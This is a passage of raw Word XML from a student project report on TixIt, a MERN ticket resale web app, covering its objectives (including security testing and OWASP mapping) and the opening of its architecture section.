      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1FC51368" w14:textId="20DD2476" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TixIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a full-stack </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MERN (MongoDB, Express.js, React.js, Node.js)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> web application designed as a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>secure ticket resale platform</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where users can buy and sell tickets for concerts, events, movies, and shows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66864AA1" w14:textId="747109AC" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The core objectives of this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mini-project</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> were:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9F820" w14:textId="6444FF72" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Build a realistic, full-stack web platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E0C435" w14:textId="27CAE836" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Simulate real-world web attacks (PoC exploits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D40444" w14:textId="09DDD816" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implement robust, production-grade security fixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B46478" w14:textId="5A1B8C82" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Map vulnerabilities to OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F192C" w14:textId="32953D8E" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Document the threat model + runbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF59510" w14:textId="3DF3BDC6" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Demonstrate security-driven software engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146445D5" w14:textId="45D763B6" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As web applications grow, they become vulnerable to a range of attacks, especially platforms handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D7A6A3" w14:textId="486AF452" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20A624" w14:textId="27BF5110" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessions &amp; tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08926E46" w14:textId="1C0F2063" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user-generated content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749D39EF" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sensitive actions (password change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC4831B" w14:textId="5DFC8295" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>third-party authentication flows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E67142" w14:textId="72646046" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This project simulates this real-world scenario by </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intentionally attempting attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the application and then </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>implementing complete mitigations</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455C683" w14:textId="25E91E21" w:rsidR="00FC5B42" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00FC5B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The final result</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hardened, secure, production-ready MERN web app</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3392F" w14:textId="215C5950" w:rsidR="00FC5B42" w:rsidRDefault="00FC5B42" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc214584796"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>System Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="66D7CB94" w14:textId="70DAA335" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This section explains the technical architecture of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TixIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> at a deep level</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344F86B" w14:textId="0EB55831" w:rsidR="00FC5B42" w:rsidRDefault="00FC5B42" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc214584797"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>High Level Architecture Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="38C979E1" w14:textId="3C56D44D" w:rsidR="003A327C" w:rsidRDefault="003A327C" w:rsidP="004E318F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07AE5642" wp14:editId="6736CCAC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>815340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>12065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3787140" cy="282575"/>
                <wp:effectExtent l="0" t="0" r="2286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7140" cy="282575"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="69D3F1E8" w14:textId="2E001D34" w:rsidR="003A327C" w:rsidRPr="00F13D01" w:rsidRDefault="003A327C" w:rsidP="003A327C">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00F13D01">
                              <w:rPr>
                                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>React Frontend  →  Express API (Node.js)  →  MongoDB</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1D9A79FB" w14:textId="626A95C2" w:rsidR="003A327C" w:rsidRPr="00F13D01" w:rsidRDefault="003A327C">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>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AE5642" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:64.2pt;margin-top:.95pt;width:298.2pt;height:22.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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="69D3F1E8" w14:textId="2E001D34" w:rsidR="003A327C" w:rsidRPr="00F13D01" w:rsidRDefault="003A327C" w:rsidP="003A327C">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00F13D01">
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>React Frontend  →  Express API (Node.js)  →  MongoDB</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1D9A79FB" w14:textId="626A95C2" w:rsidR="003A327C" w:rsidRPr="00F13D01" w:rsidRDefault="003A327C">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E90E0E" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="004E318F"/>
    <w:p w14:paraId="3FFC9703" w14:textId="10D7905A" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The frontend communicates with backend routes under /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/auth and /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/tickets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFBCA6" w14:textId="583A1845" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The backend communicates with MongoDB using Mongoose models for User and Ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC2E431" w14:textId="4B6CB6B6" w:rsidR="00FC5B42" w:rsidRDefault="00FC5B42" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc214584798"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r w:rsidR="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve"> Frontend</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve"> (React)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="2CD17E1D" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDFED95" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="008907AE" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UI for buying/selling tickets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AA5F2B" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="008907AE" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Login, signup, Google OAuth redirect handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B11E025" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="008907AE" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
